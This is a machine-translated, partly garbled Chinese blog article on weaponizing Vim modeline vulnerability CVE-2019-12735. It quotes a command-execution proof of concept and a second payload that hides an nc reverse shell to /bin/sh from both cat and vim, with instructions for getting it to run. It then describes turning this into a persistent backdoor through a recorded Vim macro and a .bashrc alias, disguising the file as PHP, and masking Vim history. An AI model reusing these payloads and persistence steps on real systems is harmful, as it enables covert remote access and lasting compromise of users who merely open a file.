Shulou(Shulou.com)05/31 Report--

This article shows you based on the VIM vulnerability CVE-2019-12735 VIM macro backdoor virus is how, the content is concise and easy to understand, absolutely can make your eyes bright, through the detailed introduction of this article hope you can get something.

Introduction to 0x00

As a vim user for many years, I was a little scared when I learned that there was a RCE vulnerability in VIM two days ago, so I specially did some research on the exploitation of this vulnerability. As I am a foot-scratching script boy, I will not explain the cause of the vulnerability in this article. As a script boy, I only care about how to use it. As for some explanation of the cause of the vulnerability, you can go to the original author's git: the original author GitHub link.

Recurrence of 0x01 vulnerabilities

First, let's talk about how to reproduce the loophole. The basic conditions for reproducing the vulnerability are:

The 1.Vim version is under influence, and most of the current versions are affected, at least the default vim version of ubuntu on GCP that I recently opened is affected around 8.0.

two。 The modeline option must be enabled, which is critical. It is not enabled by default on my GCP, so the harm of this vulnerability is seriously reduced. I am not sure whether the lower version or some derivative versions of vim will be enabled by default.

Reproduce the poc1 process:

1. Add set modeline to ~ / .vimrc to ensure that this option is turned on

two。 Use the original author's first poc to directly write to a file and save: `:! uname-a | | "vi:fen:fdm=expr:fde=assertfails (" source!\% "): fdl=0:fdt="

3. Then use vim to open the file, and if it is affected, it will print the result of uname-a, if not affected, it is a normal text.

Reproduce the poc2 process:

First, let's take a look at the poc2 that the original author wrote on git:

\ x1b [? 7l\ x1bSNothing here.\ x1b:silent! W | call system (\ 'nohup nc 127.0.0.1 9999-e / bin/sh &\') | redraw! | file | silent! # "vim: set fen fdm=expr fde=assert_fails (\ 'set\ fde=x\\ |\ source\!\%\') fdl=0:\ x16\ x1b [1G\ x16\ x1b."\ x16\ x1b [D\ n

If you are only testing, you do not have to look at this poc, this poc is mainly used to be close to the actual combat use. I estimate that some people will succeed in using this poc1, but it will never succeed in using poc2. In fact, there are several aspects of this poc that need to be changed (precisely, it cannot be copied and pasted):

1. The hexadecimal system involved in this, such as\ x1b, needs to be changed directly to binary through a binary editor, and copying and pasting is not allowed. Edit all hexadecimal positions in poc to binary.

two。 For the problem of backslashes, in the original poc, the author added more backslashes in order to escape special symbols, and removed the extra backslash "\" in front of all escaped characters.

3. If necessary, change the last\ ndirectly to enter, if\ nit is not interpreted as enter in your text.

After modifying the poc according to the above process, we start a nc listening locally on the test machine: nc-lvp 9999 finally opens poc2 and you can see that nc has obtained the rebound link.

0x02 rebuilds poc2 and joins Macro backdoor

First of all, let's talk about why we want to join the macro backdoor. The problem in poc2 is that when vim opens a document, it will no longer carry malicious code and become a normal document. Although we can get a lasting backdoor by downloading Trojans after establishing a connection for the first time, this approach is beyond the scope of discussion. My idea here is to achieve a permanent back door that gets a bounce link every time you open a document, rather than relying on downloading an external Trojan. Poc2 actually adds a lot of code to disguise the contents of a normal file, so that even if you open the file, you won't notice that there is malicious code in it, while poc1 will obviously see the code execution. This camouflage has several characteristics:

Both vim and cat opening of the affected version will not show the inserted malicious code.

Cat-v can see malicious code

Different versions of cat may see some differences in display, but malicious code is still invisible.

In order not to destroy the camouflage and make a sustainable back door, I only thought of using vim macros to achieve this effect.

The basic realization ideas are as follows:

First of all, we want the code to be executed every time the vim file is executed, so is it possible to make it execute a vim macro every time it is a vim file? This is possible, and the process is as follows:

1. Record the macro in the vim window: Q {register name}. Press Q key to stop after recording is complete.

two。 Write alias vim=vim-c'@ {register name} 'and shopt-s expand_aliases in ~ / .bashrc to open the file by replacing the vim alias with alias and execute macros by default

3. So as long as the administrator logs in to shell again, no matter what file he vim, he will execute the commands we wrote in the macro.

The next thing to do is to add the command to record the macro in the appropriate place in the poc2. In fact, the hexadecimal such as\ x1b in poc2 means ESC, which can be thought of as the button for switching mode in vim, so we can start recording macro y by adding qy before the command that needs to be executed after ESC, and end macro recording by adding Q at an appropriate location after the execution of the command. After many attempts, I finally have the following exp: a basic VIM macro sample

# there are still several problems in further optimizing the above poc:

1. Every execution will crazily insert the words alias into the bashrc, as long as the vim is inserted once, which is very bad

two。 It is not disguised as normal file content.

To improve the first problem, we can do this by executing two commands separately, and then the macro records only the first command (that is, bounce shell) and the second insert command is executed only once. It sounds easy, but it's not easy to do. Many execution will encounter a lot of problems, because I am too bad, so it took a long time. To improve the second problem, in fact, it is far from as simple as I thought, thinking that it is OK to insert text in the blank space, but in fact, it is not. The commands in the original poc will have an impact on these texts, so it is still a bit elegant to write any kind of text. Here is a case in which both of these problems are finally solved and disguised as a PHP sentence: a vim macro backdoor disguised as a php Trojan horse.

PS: finally, there is the problem of remaining executed commands in vim history commands, which can be camouflaged by inserting some junk vim commands.

The above content is based on the VIM vulnerability CVE-2019-12735 VIM macro backdoor virus is like, have you learned the knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.